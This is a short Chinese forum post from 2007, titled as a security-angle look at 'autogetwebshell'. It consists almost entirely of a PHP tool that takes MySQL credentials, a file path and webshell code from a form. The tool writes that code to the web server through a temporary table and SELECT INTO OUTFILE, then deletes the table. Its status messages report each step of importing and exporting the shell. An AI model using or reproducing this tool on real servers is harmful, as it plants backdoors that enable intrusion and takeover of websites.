autogetwebshell from secuirty angle
来源:网络技术论坛
代码- <?php
- if ($step==1){
- $link = mysql_connect($servername,$dbusername,$dbpassword);
- if ($link) {
- echo "<p>数据库服务器连接成功</p>";
- $mysql_select=mysql_select_db($dbname);
- if (!$mysql_select) {
- echo "<p>test create db $dbname</p>";
- if (mysql_create_db($dbname)) {echo "<p> .....:)</p>";
- } else {
- echo "<p>.....:(</p>";}
- }
- $ctable = " CREATE TABLE a (cmd text NOT NULL)";
- $indata="INSERT INTO a (cmd) VALUES ('".$code."')";
- $outdata="select cmd from a into outfile '".$path."'";
- $dptable= "DROP TABLE IF EXISTS a";
- $res = mysql_query($ctable);
- if ($res) {echo "<p>建立表格....成功</p>";}else{echo "<p>建立表格....失败</p>";}
- $res1 = mysql_query($indata);
- if ($res1) {echo "<p>导入shell代码....成功</p>";} else{echo "<p>导入shell代码....失败</p>";}
- echo $outdata;
- $res2 = mysql_query($outdata);
- if ($res2) {echo "<p>导出shell....成功</p>";} else{echo "<p>导出shell....失败</p>";}
- $res3 = mysql_query($dptable);
- if ($res3) {echo "<p>删除数据....成功</p>";} else{echo "<p>删除数据....成功</p>";}
- } else {
- echo "<p>数据库服务器连接失败</p>";}
- mysql_close($link);
- //表单填写
- } else{
- echo "<b>设置数据</b>\n";
- echo "<p><form action=\"autogetshell.php\" method=\"post\"></p>\n";
- echo "<p><input type=\"hidden\" name=\"step\" value=\"1\"></p>\n";
- echo "<p>服务器地址:<input type=\"text\" value=\"".$servername."\"name=\"servername\"></p>\n";
- echo "<p>数据库名: <input type=\"text\" value=\"".$dbname."\" name=\"dbname\"></p>\n";
- echo "<p>数据库用户名: <input type=\"text\" value=\"".$dbusername."\" name=\"dbusername\"></p>\n";
- echo "<p>数据库用户密码: <input type=\"password\" value=\"\" name=\"dbpassword\"></p>\n";
- echo "<p>导出webshell路径: <input type=\"text\" value=\"".$path."\" name=\"path\"></p>\n";
- echo "<p>=========================================================</P>\n";
- echo "<p>webshell代码: <textarea value=\"".$code."\" name=\"code\" cols=80 rows=10 width=32></textarea></p>\n";
- echo "<p><input type=\"submit\" name=\"next\" value=\"提交\"></p>\n";
- echo "</form>";
- }
- ?>
|
发表于 2007-2-12 17:48
|